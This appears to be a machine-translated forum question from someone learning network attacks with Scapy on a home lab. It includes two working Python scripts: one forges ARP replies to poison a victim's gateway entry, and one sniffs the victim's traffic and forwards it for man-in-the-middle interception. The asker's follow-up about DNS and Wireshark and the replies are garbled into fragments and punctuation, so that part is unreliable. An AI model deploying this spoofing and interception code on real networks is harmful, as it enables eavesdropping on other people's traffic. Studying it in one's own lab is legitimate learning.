Copied Forwarding Packages

I am just learning python with scapy. I read and use the book "Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python" (German).

I would like to try a man in a medium attack using arp-spoofing. I have My computer, a victim (my raspberry pi) and standard gateways.

For spoofing, I use a code snippet from a book

#!/usr/bin/python

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 3:
    print sys.argv[0] + " <target> <spoof_ip>"
    sys.exit(0)

iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)

It works, my victim shows my mac as a gateway. The victim sends packets with the correct ip, but my address is mac. Now the victim should open a website (wget http // example.com), and I want to use Wireshark to read traffic. But I have to redirect packets (DNS and TCP / HTTP). I tried this with this code:

#!/etc/usr/python

from scapy.all import *
import sys

iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"

def handle_packet(packet):
    if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
        packet[Ether].dst = GATEWAY_MAC
        sendp(packet)

        print "A packet from " + packet[IP].src + " redirected!"

sniff(prn=handle_packet, filter=filter, iface=iface, store=0)

Wireshark (IP Source = Victim IP, IP Destination = IP- , MAC- = MAC- , MAC- = MAC- ). Gateway - DSL-, "DNS-".

DNS. ?

,

MatStorm

+3
2

, Scapy - ; . , , .

, ? ...

0

, DNS. , , . . , 1 WLAN. , , , , , . .

0

All Articles